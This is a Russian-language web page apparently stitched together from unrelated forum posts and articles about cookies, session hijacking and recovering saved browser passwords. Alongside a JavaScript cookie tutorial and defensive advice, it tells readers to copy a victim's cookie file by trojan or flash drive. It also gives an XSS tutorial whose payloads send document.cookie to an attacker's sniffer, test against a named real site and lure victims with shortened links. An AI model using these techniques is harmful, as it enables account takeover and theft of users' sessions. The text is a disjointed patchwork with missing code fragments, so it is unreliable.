Перейти к содержимому

Как посмотреть пароли через куки

  • автор:

Как посмотреть пароли через куки

Геннадьевич,
Новогодняя лихорадка затронула и тебя. Особо одаренные сайты могут такое делать =)

Trinity,
В автоматическом режиме немного умел Cain&Abel если мне память не изменяет. В общем случае — ручным анализом

Цитата
Trinity пишет:
Господа специалисты, какой утилитой можно обработать Cookies чтобы извлечь из них аккаутны и пароли для доступа к почте, форуму и или другим ресурсам.
Цитата
TSS пишет:
Особо одаренные сайты могут такое делать =)
Цитата
Andrey Y. Ostanovsky пишет:
Обычно там если и хранятся — то хеши паролей

Бывают пассы в куках, но очень редко сейчас такое встретишь.

Из куков извлекать ничего не надо — замени ими свои куки на этот ресурс, что приведёт к перехвату сессии (но тут тоже много нюансов). Сначала прочитай что такое куки, например по ссылке Геннадьевич’а.

http://www.nirsoft.net/web_browser_tools.html IECookiesView C помощью этой программы вы сможете делать различные операции с куками в IE: чтение, удаление, редактирование, бейкап и сортировка куков. Есть возможность проводить эти манипуляции и с другими пользователями машины.

зы: Сам не пробовал, но,имхо, должна подойти для таких задач.

я в шоке . откудова в куках пароли .

redbu11 даже если галочка стоит сохранять пароль — он не там сохраняется! че за бред?

Помогите пожалуйста.
Чел около 8 лет пользовался почтой на рамблере,при очередной смене пароля указал секретный вопрос марку автомобиля и забыл на него ответ и пароль тоже забыл.Уже несколько месяцев пользуется почтой через надстройку в IE (т.е. пароль он не вводит,т.к. комп помнит(или куки-я точно не знаю).
И из-за этого мы не можем до сих пор почистить комп.Подвисает постоянно..
Чистанёшь-уже не зайдёшь в почту.
Рамблер молчит-писали в техподдержку и т.д.
Но и написывать мы не можем каждый раз,попробовали только 2 раза и не понятно туда или нет.Ответов вообщем не было.

Я сначала думал,что в куках хранится пароль.Всё излазил,логин максимум нашёл..
Кто что посоветует? Где же этот пароль хранится ? Ведь можно быть уверенным,что пароль именно в компе? Мы видим,когда приходят новые письма и т.д.Входим в почту,но вот как узнать свой пароль?
Помогите пожалуйста кому не трудно.

Цитата
capricorn пишет:
Уважаемый товарищ! Если у вас статус на форуме был хотя бы энтузиаст, я с удовольствием поверил в вашу слезливую историю, но для новичка с первым вопросом — это очередная Лапша на наши многострадальные уши

Не могу понять,что вы имели ввиду.
А что в моём вопросе для новичка не так? Ничего это не лапша.

Цитата
capricorn пишет:
В случае с ремблером, проследуйте на эту страницу

Толку от этой страницы? Говорю же,не получается ничего.При восстановлении пароля нужно ввести ответ на секретный вопрос (марка автомобиля) а какими буквами-латинскими русскими и проч и даже само название не помним.Т.е. сначала вроде BMW было,а толку-после многочисленных попыток уже и сами сомневаемся что тогда за марку выбирали.

Я вот не могу понять,вы не первый уже,кто после ПОНЯТНОГО ОБЪЯСНЕНИЯ всёравно ссылаетесь на форму восстановления пароля.
ВЕДЬ УКАЗАНО-ЗАБЫТА ИНФА ТРЕБУЕМАЯ ДЛЯ ВОССТАНОВЛЕНИЯ ПАРОЛЯ:

Методы похищения файлов cookie. Как вытащить пароль из куки Как вытащить данные из cookies яндекс

На вопрос Как достать КУКИ cokies. Нужны куки как достать подскажите плиз. 1 заданный автором Влад eeEEeeeeeeeeee лучший ответ это Что такое cookies?
Дело в том, что в процессе развития www-технологий и внедрения языков программирования в Интернет, перед разработчиками программ возникла очень серьезная проблема — как сохранять результаты выполнения алгоритма для каждого конкретно взятого пользователя на долгое время? Сам по себе протокол HTTP не имеет возможности фиксирования результатов программных процессов. Использование сессий также не является решением проблемы, так как их действие прекращается сразу после разрыва соединения с сервером.
Проблема разрешилась с внедрением механизма cookies (то есть, в переводе с английского, — «печенье»). Cookies обладают замечательным свойством — они сохраняются на винчестере пользователя и могут храниться там практически неограниченное время.
По своей сути cookies — это обычные текстовые файлы, хранящиеся в специальной директории, используемой броузером (обычно эта папка называется Temporary Internet Files), и вы можете увидеть их, зайдя в эту директорию (быстрый доступ к ней для броузера IE осуществляется через пункты меню Сервис -> Свойства обозревателя -> Временные файлы Интернета -> Настройка -> Просмотр
Одни значения cookie могут храниться только в течение одной сессии, они удаляются после закрытия броузера. Другие, установленные на некоторый период времени, записываются в файл. В общем случае этот файл называется «cookies.txt» (но их может быть несколько) и лежит в рабочей директории установленного на компьютер браузера.
иными словами
Cookie — это небольшая порция текстовой информации, которую сервер передает браузеру. Сами по себе cookies не могут делать ничего, но когда пользователь обращается к серверу (набирает его адрес в строке браузера) , сервер может считывать информацию, содержащуюся в cookies, и на основании ее анализа совершать какие-либо действия. Например, в случае авторизованного доступа к чему-либо через веб, в cookies сохраняется логин и пароль в течение сессии, что позволяет пользователю не вводить их снова при запросах каждого документа, защищенного паролем.
Если ты пытаешься получить доступ через эту тему к чужим запароленным аккаунтам, то тебе надо найти способ дистанционно (троян) или внаглую скопировав на флешь если имеешь доступ к тому компу где работает жертва скопировать это файл cookies.txt и заменить в своём (таком же) браузере свой на него. Далее заходишь на нужный сайт где интересующий тебя аккаунт, и автоматически получаешь доступ. Но учти, если жертва нажимает выход из аккаунта (например из почты) при окончании работы — то в кукисах будет стёрта инфа о сессии и ты никакого доступа не получишь.
Mozilla Firefox хранит куки в профиле пользователя, в файле C:Documents and SettingsИмя пользователяApplication DataMozillaFirefoxProfilescookies.txt
nternet Explorer сохраняет данные cookies в виде отдельных текстовых файлов в папке C:Documents and SettingsИмя пользователяCookies
Опера хранит куки в файле C:Documents and SettingsИмя пользователяApplication DataOperaOperaprofilecookies4.dat

Что такое же cookie?

Существует механизм, позволяющий http-серверу сохранять на компьютере пользователя некоторую текстовую информацию, а потом к ней обращаться. Данная информация называется cookie. По сути, каждая cookie — это пара: название параметра и его значение. Также каждой cookie присваивается домен, к которому она относится. В целях безопасности во всех браузерах http-серверу позволено лишь обращаться к cookie своего домена. Дополнительно cookie может иметь дату истечения, тогда они будут хранится на компьютере до этой даты, даже если закрыть все окна браузера.

Почему cookie важны?

Во всех многопользовательских системах cookie используются для идентификации пользователя. Вернее, текущего соединения пользователя с сервисом, пользовательской сессии. Если кто-то узнает Ваши cookie, то сможет зайти в систему от Вашего имени. Потому, что в настоящий момент очень мало интернет-ресурсов проверяет смену IP-адреса в течении одной пользовательской сессии.

Как изменить или подменить cookie?

Разработчики браузеров не предоставляют встроенных средств для редактирования cookie. Но можно обойтись и обычным блокнотом (notepad).

Шаг 1: создаем текстовый файл с текстом

Windows Registry Editor Version 5.00

Сохраняем его под именем IE_ext.reg

Шаг 2: С помощью созданного файла добавляем изменения в реестр Windows.

Шаг 3: создаем текстовый файл с текстом

external.menuArguments.document.cookie= «testname=testvalue; path=/; domain=testdomain.ru» ;
alert(external.menuArguments.document.cookie);

Сохраняем его под именем C:\IE_ext.htm

Шаг 4: Заходим на интересующий нас интернет-сайт.

Шаг 5: Правой кнопкой мыши кликам на свободном месте странице и выбираем пункт меню «Работа с Cookies» . Разрешаем доступ к буферу обмена. В буфер обмена попадут Ваши cookie данного сайт. Можете вставить их блокнот (notepad) и посмотреть.

Шаг 6: Для изменения некоторого cookie редактируем файл C:\IE_ext.htm, заменяя testname на имя cookie, testvalue — на его значение, testdomain.ru – на домен сайта. При необходимости добавляем еще подобные строчки. Для удобства контроля я добавил в скрипт вывод текущих cookie до и после изменения: alert(external.menuArguments.document.cookie);

Шаг 7: Выполняем еще раз Шаг 5, а потом обновляем страницу.

Итог: мы зайдем на данный интернет-ресурс с обновленными cookie.

Как украсть cookie с помощью JavaScript?

Если злоумышленнику удалось найти возможность выполнить произвольный JavaScript-скрипт на компьютере жертвы, то прочитать текущие cookie он может очень легко. Пример:

var str= document.cookie;

Но сможет ли он их передать на свой сайт, ведь, как я указывал ранее, JavaScript-скрипт не сможет без дополнительного подтверждения обратиться к сайту, находящемуся в другом домене? Оказывается, JavaScript-скрипт может загрузить любую картинку, находящуюся на любом http-сервере. При этом передать любую текстовую информацию в запросе на загрузку этой картинке. Пример: http://hackersite.ru/xss.jpg?text_info Поэтому если выполнить такой код:

var img=new Image();

то cookie окажутся в запросе на загрузку «картинки» и «уйдут» к злоумышленнику.

Как обрабатывать такие запросы на загрузку «картинки»?

Злоумышленнику нужно лишь найти хостинг с поддержкой php и разместить там код подобный такому:

Тогда все параметры запросов к этому скрипту будут сохраняться в файле log.txt . Осталось лишь в ранее описанном JavaScript-скрипте заменить http://hackersite.ru/xss.jpg на путь к данному php-скрипту.

Я показал лишь самый простой способ использования XSS-уязвимостей. Но это доказывает, что наличие хотя бы одной такой уязвимостей на многопользовательском интернет-сайте может позволяет злоумышленнику пользоваться его ресурсами от Вашего имени.

JavaScript дает возможность устанавливать и читать куки в браузере. В данном уроке мы рассмотрим как происходит работа с куками, а также сделаем простую страницу, которая будет помнить введеное имя и отображать его при каждом входе.

Что такое куки (cookie)?

Куки — это небольшой объем данных, которые хранятся вэб браузером. Они позволяют Вам сохранять определенную информацию о пользователе и получать ее каждый раз, когда он посещает Вашу страницу. Каждый пользователь имеет свой собственный уникальный набор куков.

Обычно куки используются веб сервером для выполнения таких функций как отслеживание посещений сайта, регистрации на сайте и сохранения сведений о заказах или покупках. Однако нам не нужно придумывать программу для вэб сервера чтобы использовать куки. Мы можем использовать их с помощью JavaScript.

В JavaScript куки доступны с помощью свойства cookie объекта document. Создать куки можно следующим образом:

И получить весь сохраненый набор куков так:

Var x = document.cookie;

Давайте рассмотрим сохранение и получение куков более подробно.

Для сохранения куки нужно присвоить document.cookie текстовую строку, которая содержит свойства куки, которые мы хотим создать:

document.cookie = » name = значение; expires= дата; path= путь; domain= домен; secure»;

Свойства описаны в таблице:

Свойство Описание Пример
name = значение Устанавливает имя куки и его значение. username=Вася
expires= дата Устанавливает дату истечения срока хранения куки. Дата должна быть представлена в формате, который возвращает метод toGMTString() объекта Date . Если значение expires не задано, куки будет удалено при закрытии браузера. expires=
13/06/2003 00:00:00
path= путь Данная опция устанавливает путь на сайте, в рамках которого действует куки. Получить значение куки могут только документы из указанного пути. Обычно данное свойство оставляют пустым, что означает что только документ установивший куки может получит доступ к нему. path=/demo/
domain= домен Данная опция устанавливает домен, в рамках которого действует куки. Получить значение куки могут только сайты из указанного домена. Обычно данное свойство оставляют пустым, что означает, что только домен установивший куки может получит доступ к нему. domain=сайт
secure Данная опция указывает браузеру, что для пересылки куки на сервер следует использовать SSL. Очень редко используется. secure

Давайте посмотрим пример установки куки:

document.cookie = «username=Вася; expires=15/02/2011 00:00:00»;

Данный код устанавливает куки username , и присваивает ему значение «Вася» , которое будет храниться до 15-го февраля 2011 года (используется Европейский формат времени!).

var cookie_date = new Date (2003, 01, 15); document.cookie = «username=Вася; expires logged_in=yes»;

Данный код устанавливает куки logged_in , и присваивает ему значение «yes» . Так как атрибут expires не установлен, то куки удалится при закрытии браузера.

var cookie_date = new Date (); // Текущая дата и время cookie_date.setTime (cookie_date.getTime() — 1); document.cookie = «logged_in=; expires username=» + escape(«Вася Пупкин») + «; expires=15/02/2003 00:00:00»; Функция для установки куки

Установка куки станет проще, если мы напишем специальную функцию, которая будет выполнять простые операции, такие как перекодирование значений и построение строки document.cookie . Например:

Function set_cookie (name, value, exp_y, exp_m, exp_d, path, domain, secure) < var cookie_string = name + "=" + escape (value); if (exp_y) < var expires = new Date (exp_y, exp_m, exp_d); cookie_string += "; expires=" + expires.toGMTString(); >if (path) cookie_string += «; path=» + escape (path); if (domain) cookie_string += «; domain=» + escape (domain); if (secure) cookie_string += «; secure»; document.cookie = cookie_string; >

Функция получает данные для куки в качестве аргументов, затем строит соответствующую строку и устанавливает куки.

Например, установка куки без срока хранения:

set_cookie («username», «Вася Пупкин»); set_cookie («username», «Вася Пупкин», 2011, 01, 15);

Установка куки со сроком хранения, доменом сайт , использованием SSL, но без пути:

set_cookie («username», «Вася Пупкин», 2003, 01, 15, «», «сайт», «secure»); Функция для удаления куки.

Другая полезная функция для работы с куки представлена ниже. Функция «удаляет» куки из браузера посредством установки срока хранения на одну секунду раньше текущего значения времени.

Получение значения куки

Для того, чтобы получить значение предварительно установленного куки для текущего документа, нужно использовать свойство document.cookie:

Var x = document.cookie;

Таким образом возвращается строка, которая состоит из списка пар имя/значение, разделенных точкой с запятой для всех куки, которые действуют для текущего документа. Например:

В данном примере 2 куки, которые были предварительно установлены: username , который имеет значение «Вася» , и password , который имеет значение «abc123» .

Функция для получения значения куки

Обычно, нам нужно только значение одного куки за один раз. Поэтому строка куки не удобна для использования! Здесь приводится функция, которая обрабатывает строку document.cookies , возвращет только то куки, которое представляет интерес в конкретный момент:

Function get_cookie (cookie_name)

Данная функция использует регулярное выражение для поиска имени куки, которое представляет интерес, а затем возвращает значение, которое обработано функцией unescape() для перекодирования к нормальному символьному виду. (Если куки не найдено, возвращается значение null.)

Данная функция проста в использовании. Например, для возврата значения куки username:

Var x = get_cookie («username»);

Простой пример использования

В данном примере мы сделали страницу, которая запрашивает Ваше имя при первом посещении, затем она сохраняет Ваше имя в куки и показывает его при следующих посещениях.

Откройте страницу в новом окне. При первом посещении она попросит ввести имя и сохранит его в куки. Если Вы посетите страницу еще раз, она отобразит на экране введенное имя из куки.

Для куки задаем срок хранения в 1 год от текущей даты, это означает, что браузер сохранит Ваше имя даже если Вы закроете его.

Вы можете посмотреть код страницы в браузере, выбрав функцию просмотра исходного кода. Здесь приводится основная часть кода:

Данный урок показал Вам, как использовать куки в JavaScript для хранения информации о Ваших посетителях. Спасибо за внимание! 🙂

На картинке видно, что в cookie присутствует строка wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Это значение находится в незашифрованном виде в файле cookie и его легко перехватить с помощью утилиты Achilles, но как правило в большинстве случаев в Achilles можно увидеть лишь хеш той или иной записи. Перед отсылкой запроса на сервер можно попытаться заменить эту строку на любую подобную (хотя в данном случае смысла нет) — количество попыток не ограничено. Затем, отослав этот запрос на сервер с помощью кнопки Send, можно получить ответ от сервера, предназначаю­щийся администратору.

В предыдущем примере можно использовать прямую подмену идентификатора пользователя. Кроме того, название параметра, подмена значения которого предоставляет дополнительные возможности хакеру, может быть следующим: user (например, USER=JDOE), любое выражение со строкой ID (например, USER=JDOE или SESSIONID=BLAHBLAH), admin (например, ADMIN=TRUE), session (например, SESSION=ACTIVE), cart (например, CART=FULL), а также такие выражения, как TRUE, FALSE, ACTIVE, INACTIVE. Обычно формат файлов cookie очень зависит от приложения, для нужд которого они используются. Однако приведенные советы по поиску изъянов приложений с помощью файлов cookie годятся практически для всех форматов.

Меры противодействия извлечению информации из файлов cookie, выполняемые на стороне клиента

В общем случае пользователь должен осторожно относиться к Web-узлам, использующим файлы cookie для аутентификации и хранения важных данных. Также необходимо помнить, что Web-узел, использующий для аутентификации файлы cookie, должен поддерживать хотя бы протокол SSL для шифрования имени пользователя и пароля, так как в случае отсутствия этого протокола данные передаются в незашифрованном виде, что позволяет перехватывать их, ис­пользуя простейшие программные средства для просмотра данных, пересылаемых по сети.

Компания Kookaburra Software разработала инструмент, облегчающий использование файлов cookie. Называется инструмент CookiePal (http://www.kburra.com/cpal.html (см. www.kburra.com) ). Данная программа предназначена для предупреждения пользователя при попытке Web-узла установить на машину файл cookie, при этом пользователь может разрешить или запретить это действие. Подобные функции блокирования файлов cookie на сегодня есть во всех браузерах.

Еще одной причиной регулярной установки обновлений Web-броузера, является постоянно выявляемые изъяны системы безопасности этих программ. Так, Бенет Хэйзелтон (Bennet Haselton) и Джеми МакКарти (Jamie McCarthy) создали сценарий, который после щелчка на ссылке извлекает файлы cookie с машины клиента. В результате становится доступным все со­держимое файлов cookie, которые находятся на машине пользователя.

Взлом подобного рода может быть также осуществлен с помощью дескриптора , встраиваемого в HTML-текст на Web-странице (или в HTML-содержимое электронного письма или рассылки групп новостей) для похищения файлов cookie. Рассмотрим следующий пример:

Для того, чтоб подобные вещи не грозили нашим личным данным, сам так делаю и всем советую всегда обновлять ПО, работающее с HTML-кодом (e-mail клиенты, медиа-проигрыватели, браузеры и т.д.).

Многие предпочитают просто блокировать получение файлов cookie, однако, большинству Web-узлов для просмотра необходима поддержка cookie. Вывод – если в скором будущем появится инновационная технология, позволяющая обходится без cookie, программисты и администраторы с облегчением вздохнут, а пока cookie остается лакомым куском для хакера! Это действительно так, поскольку более качественной альтернативы пока не существует.

Меры противодействия, выполняемые на стороне сервера

В случае рекомендаций по обеспечению безопасности сервера специалисты дают один простой совет: не используйте механизм cookie без особой на то необходимости! Особенно необходимо быть осторожными при использовании файлов cookie, которые остаются в системе пользователя после завершения сеанса связи.

Конечно же, важно понимать, что файлы cookie могут использоваться в целях обеспече­ния безопасности Web-серверов для осуществления авторизации пользователей. Если все же разрабатываемому приложению необходимо использовать файлы cookie, то этот механизм следует настроить таким образом, чтобы при каждом сеансе использовались различные клю­чи с коротким периодом действия, а также стараться не помещать в эти файлы информацию, которая может быть использована хакерами для взлома (такую как ADMIN=TRUE).

Кроме того, для обеспечения большей безопасности при работе с файлами cookie можно использовать их шифрование для предотвращения извлечения важной информации. Конечно же, шифрование не решает всех проблем безопасности при работе с технологией cookie, однако этот метод позволит предотвратить наиболее простые взломы, описанные выше.

Мой знакомый забыл пароль к одному сайту. Однако ранее он поставил при входе флажок «Запомнить меня» в браузере Google Chrome, что позволяло ему заходить на сайт под своим аккаунтом. Мне прилетел вопрос, можно ли перенести это волшебное состояние на другой компьютер. Правильнее, конечно, было бы сменить или восстановить пароль, но сделать это знакомый не мог по причинам, не относящимся к делу.

Как пользоваться intercepter-ng для чайников

Несмотря на многообразие выбора современного софта, программы для взлома на андроид лучше, чем intercepter ng найти сложно. Первым критерием, указывающим в пользу данного продукта, является его реальная работоспособность. Большинство предлагаемых снифферов в сети – только имитация, не выполняющая заявленных функций.

Следующими положительными факторами является многофункциональность приложения и охват широкой аудитории пользователей.

Компьютерная помощь 939-29-71

Начнём по порядку. Cookies или » куки » — это очень маленькие текстовые файлики — закладки с информацией.

Эту информацию веб — сервер передает на браузер пользователя. где эта информация и хранится до востребования. Не совсем понятно. Ну. хорошо.

постараюсь ещё проще. Смотрите. вы зарегистрировались на каком — либо сайте.

В момент регистрации и создаются эти самые » куки «.

Вот они — то и являются.

Программа прослушивает трафик в WiFi-сети, перехватывает cookies и реплицирует сессию пользователя в вашем браузере, повторяя запросы с его учётными данными. Автор Мэтью Салливан (Matthew Sullivan) провёл презентацию программы 30 сентября на конференции хакеров Derbycon. Прямо во время выступления Мэтью Салливан перехватил по WiFi незащищённую сессию с Google одного из посетителей конференции.

Как украсть куки

Если, находясь на странице сайта, Вы введёте в адресную строку браузера Firefox или Opera следующий текст: javasсript:document.write(document.сооkiе); то увидите нечто вроде: remixAdminsBar=0; remixGroupType=0; remixpass=******************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Внимание! .

Полное пособие по межсайтовому скриптингу

XSS – это тип уязвимости программного обеспечения, свойственный Web-приложениям, который позволяет атакующему внедрить клиентский сценарий в web-страницы, просматриваемые другими пользователями В Wikipedia содержится следующее определение для XSS: «Межсайтовый скритинг (XSS) – это тип уязвимости программного обеспечения, свойственный Web-приложениям (путем обхода ограничений безопасности браузера)», который позволяет атакующему внедрить клиентский сценарий в web-страницы, просматриваемые другими пользователями.

Разница между cookie и сессиями

Не так давно я писал статью о том, как сделать регистрацию и авторизацию пользователей на сайте.

«. В этой статье я собираюсь разобрать разницу между сессиями и cookie . чтобы Вы окончательно определились с выбором.

Cookies. Нет, речь вовсе не о печенье, речь о вашей безопасности. Вот заходите вы свой любимый сайт «vkontakte» (или, например, посмотреть почту) на чужом компьютере, отказываетесь от опции «сохранить пароль», радостно просматриваете почту и уходите. И не задумываетесь о том, что под вашим именем теперь можно зайти в социальную сеть или почту.

Я даже не рассматриваю ситуацию с программой, которая запомнила пароль без вашего ведома. Это уже взлом сознательный, и вы, наверное, будете подозревать, что что-то такое может случиться и не зайдете на таком компьютере на любимый сайт. Но речь может идти о простом человеческом любопытстве — были в гостях у знакомых, а тут раз, и они получают возможность почитать вашу почту. Вы уверены, что они откажутся от такой возможности? А вы не боитесь, что что-то выплывет? В любом случае, я отложу вопросы нравственности и просто поговорю о том, каким образом созраняется на компьютере информация о том, что вас теперь можно пустить на какой-то сайт не запрашивая пароля.

как украсть Cookie

И имя этой технологии — cookies.

А началось все вот с чего. Протокол http по которому, собственно, вы и просматриваете сайты (включая этот) изначально не предполагал возможности поддержания соединения. То есть, грубо говоря, вы отправляете запрос на сайт, получаете ответ, он отображается на экране, а дальше сервер ничего о вас не помнит. Это, конечно, хорошо, когда сайт чисто информационный и не должен ничего о вас помнить, но мы же живем в веке Web 2.0 �� Естественное развитие протокола — POST и GET запросы, когда вы отправляете какие-то данные, сервер может записать их в базу данных, но и этого оказывается недостаточно.

Рассмотрим очень простой пример. Форум. Вот вы зарегистрировались, и на форуме есть запись о том, что есть такой-то пользователь с таким-то паролем и какими-то еще дополнительными данными. Но вот теперь вы заходите на форум и авторизуетесь — вводите свой пароль. Где-то должна сохраниться информация о том, что вы авторизовались. На сервере? Конечно, нет! На сервере невозможно сохранить информацию о том, что именно с вашего компьютера была произведена авторизация — он не сможет отличить вас от кого-то другого (даже ваш IP-адрес вас не идентифицирует однозначно)! Таким образом, информацию о том, что произошла авторизация нужно хранить на вашем компьютере. Вот зачем нужны cookies, именно для этого они и были созданы.

Cookie — это маленькая запись на вашем компьютере, хранящая информацию о сайте, который вы посетили. При авторизации создается подобная запись, после чего вы уже можете гулять по форуму, и он будет вас опознавать. Однако, это уже будет происходить автоматически — благодаря информации, хранящейся в cookie — так что сделать вид, что вы являетесь главным администратором форума, все равно не получится в обход проверки пароля.

Теперь можно вернуться к тому, с чего начиналась эта статья. Если вы авторизовались где-то даже не сохраняя пароль, то может случиться так, что на компьютере создалась запись, позволяющая теперь входить на этот ресурс под вашим именем без авторизации. Такая запись сама устареет через некоторое время, но можно ее принудительно очистить. В каждом браузере это делается по-своему, я покажу, как это можно сделать в моем любимом Google Chrome. Открываем параметры

Переходим на вкладку «расширенные» и находим кнопку «показать Cookies»

Теперь, конечно, можно удалить и все cookies, но это может расстроить хозяина компьютера. Поэтому, например, в верхнем поле можно ввести название интересуещего вас сайта

Тогда можно произвести очистку только cookies, относящихся к этому сайту. Можете попробовать на моем. При этом если вы авторизуетесь на моем форуме, а затем очистите cookies, то информация об авторизации будет забыта. Попробуйте!

comments powered by

1.Что такое XSS(англ. Сross Site Sсriрting — «межсайтовый скриптинг»)
Уязвимость типа XSS позволяет вставить произвольный javascript код в тело страницы. Атака XSS отличается от других(напр. SQL injection или PHP injection) тем, что действует не на сервер, а на клиента.

как украсть cookies

С ее помощью нельзя посмотреть таблицы БД, залить шелл и т.п. Чаще всего XSS испульзуют для кражи cookies.
Cookies(Куки) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла. Обычно куки используются для хранения учетных записей, и, чаще всего, в них находятся закодированные пароль, логин, и идентификатор сессии.(хотя далеко не всегда)
XSS бывают двух типов, активные и пассивные.

Пассивные XSS требуют от жертвы непосредственного участия, например перейти по ссылке, содержащей javascript код. При использовании этого типа XSS не обойтись без СИ(Социальная Инженерия)

Активные XSS не требуют никакого участия со стороны жертвы, ей достаточно лишь зайти на страницу с XSS. Активные XSS могут быть, например, в сообщениях на форумах, чатах, в добавлении новости и т.п.

2.Поиск XSS
В этом пункте я расскажу как найти xss

2.1.Пассивные XSS
Чтобы найти пассивную XSS достаточно подставить в форму ввода alert(‘xss’) если скрипт сработал и появилось сообщение «xss» значит уязвимость присутствует, если скрипт не сработал можно еще попробывать «>alert(), это, наверное самая распространенная xss уязвимость. Если ни тот ни другой скрипт не сработал то уязвимости, скорее всего, нет.
Рассмотрим на примере.
http://miss.rambler.ru/srch/?sort=0&amp … amp;words=
Видите форму «искать»? вставим туда «>alert() и нажмем «найти»
Вылетело окошко c xss, значит xss присутствует.(возможно, на момент прочтения вами данной статьи эту xss уже пофисят)

2.2.Активные XSS
Такие ксс могут быть, например, в полях профиля, при добавлении новости в названии новости и в самой новости(реже), в сообщениях на форумах/чатах/гостивухах при включенном html. Тут все просто, вписываем в поля скрипт из предыдущего подпункта, и если сообщение вывелось на экран, то уязвимость присутствует.
Рассморим xss в BB тегах на форумах.
можно попробовать тупо вставить javascript код в тег, например так:
javasсriрt:alert(‘xss’)
У некоторых тегов есть параметры, например у тега есть параметры dynsrc и lowsrc, попробуем подставить код так:
http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)
Если скрипт сработал, xss есть

3.Использование XSS для кражи cookies
Теперь самое вкусное))))
Для того чтобы украсть куки нам понадобится веб-сниффер, можно установить какой-нибудь сниффер на свой хостинг, а можно воспользоваться онлайн-сниффером, которых сейчас полно.
Чтобы украсть куки через пассивеую XSS надо чтобы жертва прошла по ядовитой ссылке. Чтобы украсть куки мы будем исользовать вместо alert(‘xss’) другой скрипт:
img = new Image();

подставляем скрипт в ссылку и даем жертве перейти по ней, смотри лог сниффера и радуемся.
Рассмотрим на примере.
Возьмем ту XSS на рамблере из предыдущего пункта.
Вставляем
«>
img = new Image();
img.src = «адрес картинки-сниффера»+document.cookie;

в форму поиска, нажимаем «найти», смотрим адресную строку и видим:

http://miss.rambler.ru/srch/?sort=0&amp … &words >img = new Image();img.src = «адрес картинки-сниффера»+document.cookie;
в URL Или воспользоваться сервисами типа http://tinyurl.com/
Перейдем к активным XSS, тут все просто, вместо alert() вставляем img = new Image();img.src = «адрес картинки-сниффера»+document.cookie;

Теперь у нас есть куки. Но что с ними делать? Все просто, их надо подставить вместо своих. В браузере Opera есть встроеный редактор cookies(инструменты->дополнительно->управление cookies), для firefox есть плагин(не помню как называется, юзайте гугл)
На этом пока все, возможно статья будет дополняться

Как вытащить пароль из куки

При соответствующих настройках в Opera пароли автоматически сохраняются. Таким образом, вам не придется вводить данные каждый раз, когда вы хотите зайти на сайт. Но не забывайте, что визуально вы не сможете увидеть пароль, ведь чаще всего он спрятан за значками звездочек. Что же делать, если вы забыли данные, а они вам нужны? На самом деле способы «вытащить» пароль из браузера существуют, и сейчас мы их рассмотрим.

Использование инструментов браузера

Для того чтобы узнать введенные данные, необходимо зайти на нужный сайт и нажать «Жезл паролей». Подождите, пока поля не заполнятся точками, а затем нажмите на Esc. В строке адреса нужно ввести javаscript:(functiоn () < inp = dоcument.gеtElemеntsByTаgName(‘input’); fоr (vаr j = 0; j

Создатели компьютерного программного обеспечения разработали огромное число приложений, которые помогают пользователю во время повседневной работы за ПК. Одним из таких элементов являются файлы «Cookies». Их предназначение заключается в следующем – они способствуют быстрому заключению к веб-странице, а также сохраняют информацию. Эта функция становится очень важной, при необходимости найти утерянные пароли.
Порядок действий при уточнении пароля
В ряде случае владельцу компьютерной техники необходимо узнать имя и пароль, под которыми совершалось пользование тем или иным интернет-ресурсом. Процесс зависит от вида интернет-обозревателя, с помощью которого совершается вход. Так, при использовании браузера, к примеру, «Mozilla Firefox» обратите свое внимание, что он оснащен опцией «Записи Cookies», которые позволяют узнать данные прямо в программе. Для этого лишь нужно отыскать в меню раздел «Инструменты». Здесь можно увидеть несколько вкладок, среди которых следует перейти к «Защите». Перед пользователем появится окно, где размещен интересующий вас пункт «Сохраненные пароли». Открыв его, можно просмотреть весь список логинов, оставленных пользователями на разнообразных интернет-ресурсах. Также их можно защитить, установив в меню особенный пароль. Таким образом, проводится защита конфиденциальных данных.
Если же вы сторонник браузера «Opera», то обладаете возможностью узнать лишь имена тех, кто пользовался интернетом. Для получения этой информации, необходимо перейти во вкладку «Менеджер паролей», которая располагается в меню «Инструменты». Здесь можно просмотреть существующие логины. Чтобы отобразить и пароли, необходимо дополнительно установить «Opera Password Recovery».
Некоторые пользователи предпочитают использовать интернет-браузер «Google Chrome». В этом проводнике на панели инструментов найдите раздел «Настройки в параметрах». Здесь можно отыскать пункт «Показать файлы Cookies». Именно здесь размещается информация, интересующая вас.
Пользователи приложения «Internet Explorer» должны дополнительно установить утилиту под названием «Behind The Asterisks». Она и позволяет вытащить сохраненные пароли. Утилита является бесплатным продуктом, который без проблем можно использовать и в других браузерах.
Имя и пароль – это конфиденциальная информация, но в ряде случае появляется необходимость узнать эти исключительные данные. Это можно совершить с помощью файлов «Cookies». Сам порядок действий отличается в зависимости от вида используемого браузера. Правильный подход позволит в короткие сроки выполнить требуемые задачи.

Но что делать, если я забыл пароль, и теперь нужно каким-то образом его вытащить из браузера?

В данной статье мы рассмотрим вариант извлечения паролей из программы Opera . Это тоже популярный браузер, который используют миллионы пользователей по всему миру, особенно в России и СНГ. На самом деле можно скопировать себе файл, в котором все комбинации паролей и сайтов хранятся. Конечно, он зашифрован, но есть специальные программы, которые позволяют просматривать содержимое таких файлов, копировать и переносить информацию, вносить изменения и многое другое.

как из куков достать пароль на опере?

никого ломать не собираюсь. мой компьютер. мой браузер. мои куки. в одном из сайтов потеряла пароль. система восстановления не пойдет. потому что почту тоже потеряла. сейчас на сайт захожу. так как опера помнит куки.как из куков достать пароль ?у меня версия оперы 36.0.2130.65.пароли в настройках показать смотрела нет.их там. нашла wand.dat он пустой. открывала unwand ну нечего там нет. но раз открывается сейчас сайт значит куки есть.как их достать?чтобы увидеть пароль?

Есть маленькая портабельная программа WebBrowserPassView.

Просмотр паролей, хранящиеся в веб-браузере (поддерживает Internet Explorer, Firefox , Chrome , Safari и Opera ) Попробуйте, может поможет.

Скажите, а до этого момента что вы потеряли пароли, они хранились в браузере?
Если да, то можно попробовать вернуть их с помощью ранних точек восстановления, т.е. из них вытащить Бэкап Оперы и все восстановить как описано Здесь

В принципе можно вытащить пароли хранящиеся в браузере вот этой портабельной программкой WebBrowserPassView v1.70

